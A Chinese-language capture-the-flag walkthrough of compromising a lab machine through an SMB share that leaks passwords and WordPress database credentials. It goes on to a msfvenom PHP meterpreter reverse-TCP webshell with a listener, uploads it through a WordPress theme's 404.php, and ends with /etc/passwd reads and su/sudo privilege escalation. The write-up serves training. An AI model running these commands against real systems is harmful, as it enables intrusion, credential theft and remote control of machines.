CTF夺旗 SMB信息泄露

SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为samba。

实验环境
1、Windows下虚拟机系统kali Linux,用了之后发现kali Linux系统里面的那些小软件特别多。
2、 靶场机器

我们的目的就是获取靶场机器上的flag

信息探测:

对于只是给定的一个对应ip地址靶场机器,我们需要对其进行扫描,探测开放的服务。

打开终端,输入
ifconfig
如下图所示:
在这里插入图片描述渗透其实是针对服务的漏洞探测,然后进行对应的数据包发送,获取机器的最高权限.

nmap -sV ip      挖掘开放服务信息

nmap -A -v -T4 ip     挖掘靶场全部信息

扫面之后发现, 端口开放了SMB服务,之后我们就可以进行登录 。登录时使用直接使用空密码。

指令如下:

smbclient -L ip

然后下面就会紧跟着打印驱动、一个共享文件夹(share$)、一个空连接。
然后进行如下指令打开共享文件夹:

smbclient '\\ip\share$'

输入指令ls查看共享的文件夹。发现sharegetgetshare里发现许多敏感文件,用get 下载下来到本地查看 基本语法 get后加打开share里面的文件名。
例如 deets.txt
然后另外打开终端新窗口输入 cat deets.txt 然后可以发现泄露了一个密码12345;
wordpress目录下的config是个配置文件(小文件用cat看,大文件用gedit看)(一般配置文件都是泄露了用户名和密码),发现泄露了数据库的用户名和密码。

制作webshell
基本语法:
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.php
启用监听:
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

上传webshell
一般会使用 dirb ip 进行网站探测
使用找到的敏感信息登录系统后台,上传webshell。执行webshell(访问具有webshell的php页面)

获得反弹的shell

wordpress 上传点 theme 404.php
执行:http://靶场IP/wordpress/wp-content/themes/twentyfourteen/404.php

查找flag信息:
查找敏感信息,提升root权限,查看flag值。
优化终端:python –c “import pty; pty.spawn(”/bin/bash")’
查找用户名: cat /etc/passwd
查找密码: 在共享目录下的敏感文件,提升权限
用于切换 su 用户名(上述查找的用户名)
sudo –l 查看上述su有哪些操作
su sudo 提升权限

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章